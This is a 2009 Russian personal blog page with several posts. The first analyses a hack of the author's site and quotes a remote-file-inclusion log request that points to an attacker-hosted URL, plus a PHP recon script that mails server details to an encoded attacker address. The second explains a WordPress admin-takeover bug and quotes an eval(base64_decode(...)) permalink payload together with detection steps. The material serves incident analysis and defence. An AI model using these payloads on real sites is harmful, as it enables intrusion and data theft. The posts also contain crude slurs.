Тег «Редиски»

Уродские азиатские хакеры

16 Сен 2009 admin | Ваш отзыв | Рубрика Ликбез

saigonНачинаю потихоньку распутывать клубок со взломом моего уютненького. В логах сервера значится:

GET /date/2008/08/page/2%20//components/com_facileforms/facileform.frame.php?ff_compath= http://www.sportsedu.net/zboard/data/writeskill/id.txt???

по адресу  http://www.sportsedu.net/zboard/data/writeskill/id.txt??? получаем скриптец вида

echo «k4l0nk<br>»;
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv(«SERVER_SOFTWARE»);
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

и в конце закодированный BASE64 скрипт:

$creator=base64_decode(«YmlnZy5iaWdnNkBnbWFpbC5jb20=»);
($safe_mode)?($safez=»ON»):($safez=»OFF_HEHE»);
$base=»http://».$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv(«REMOTE_ADDR»); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = «\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds»;
$from =»From: «.$writ.»___=».$safez.»";
mail( $creator, $subj, $msg, $from);

путем некоторых манипуляций, получаем email злоумышленника: bigg.bigg6.@gmail.com
обращение шло с айпа 202.172.170.33 (сингапур). Вот такие вот дела, камрады. Буду копать дальше, т.к. это возможно не все.

Теги: ,

Взлом блогов на вордпресс

16 Сен 2009 admin | Ваш отзыв | Рубрика Новости

hackerНайден баг в движке вордпресс, позволяющий любому пидорасу, считающему себя хаккером, получить права администратора. В частности, на этом блоге было обнаружено 2 таких «администратора». Как обнаружить: заходим в «Авторы и пользователи». Нам пишут Администраторы (XXX), где XXX – число юзеров, зареганых как админы. Если это число отличается в бОльшую сторону от того, сколько реальных администраторов, то труба- вас ломанули. Лечится сменой прав для пидораса и последующим обновлением движка до 2.8.4 и выше.Как пишут на вп-инфо.ру:

Обнаружить взломан Ваш блог или нет можно по выполнив следующие действия:
1) Проверить структуру ЧПУ (Админка – Параметры – Постоянные ссылки) на вредоносный код по типу:
/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}} – если он есть то убрать его. (восстановив прежний вид ЧПУ).

2) Проверить количество администраторов блога (Админка – Пользователи – вверху страницы строка со всеми пользователями и их количеством), убедиться что на блоге только ОДИН администратор. Если администраторов больше одного то нужно удалить лишних, при этом в списке пользователей их может быть не видно. Существует несколько способов найти и удалить лишних админов, но на мой взгляд самый точный и самый удобный воспользоваться phpMyAdmin.

Запрос который необходимо выполнить к базе данных блога выглядит вот так:

SELECT u.ID, u.user_login
FROM wp_users u, wp_usermeta um
WHERE u.ID = um.user_id
AND um.meta_key = ‘wp_capabilities’
AND um.meta_value LIKE ‘%administrator%’;

Далее просто выбираем лишних админов и удаляем их.

В общем, грустно это как-то, что такой мощный движок содержит такую дыру.

Теги: ,

«Преимущества» бесплатной почты

11 Июл 2009 admin | Ваш отзыв | Рубрика Ликбез

Спасибо, дорогой Яндекс, что я не могу получить письмо об активации кошелька вебмани со вчерашнего дня. Вообще отлично.

Такое ощущение, что почта вообще не ходит.

cheeseА всего-навсего, надо было регистрировать кошелек, используя не бесплатный email на Яндексе, а любой ящик, благо доменов у меня много.  В общем, самая правильная схема, это получение почты на коммерческий ящик (собственное доменное имя). Если спама много, то можно фильтровать, используя бесплатные сервисы (через тот же Яндекс) . Но получатель должен быть собственный. Помимо всего, если вдруг выйдет ссора с владельцем бесплатной службы, то может произойти очень печальная вещь, с последующей головной болью по восстановлению аккаунтов, сменой email адресов и т.п.

Да, я поссорился с liveinternet.ru (в сервисе статистики). Меня забанили – теперь ни по одному своему сайту не получу статистику никогда ))))

Теги:

Бегун добегался или летс мэйк шэйв-шэйв.

09 Июн 2009 admin | Отзывов: 2 | Рубрика Новости

11UPD. @10.06.2009

Клики начислились сами собой, за все предыдущие дни. о чудо. причем нормально так начислились. вчерашний день показал рекорд (больше в 2 раза чем обычно). я думаю это связано со спецификой системы статистики. что-то где-то меняют. Приношу свои извинения, был неправ что плохо подумал, и все такое. По ссылке я объясняю причину таких нервов
Кризис в полный рост докатился до рекламных бирж. Например, это выразилось в том, что Бегун перестал учитывать клики на рекламных площадках (подозреваю, что со счета рекламодателя денежка снимается исправно, а вот комиссия на счет вебмастера не перечисляется). До данного умозаключения я дошел «совершенно случайно»:)

Читать полностью »

Теги: , ,

Link.ru – бобик сдох

09 Июн 2009 admin | Ваш отзыв | Рубрика Новости, Обзоры сайтов

linkruЛюбопытна однако тенденция рекламных бирж к увяданию, сдыханию и шейву кликов. В следующем выпуске я расскажу про бегуна. Сегодня наш герой – link.ru. С марта висит заявка на вывод смехотворной суммы из аккаунта. Думаю, при таком раскладе, делать в этой системе нечего.

Теги: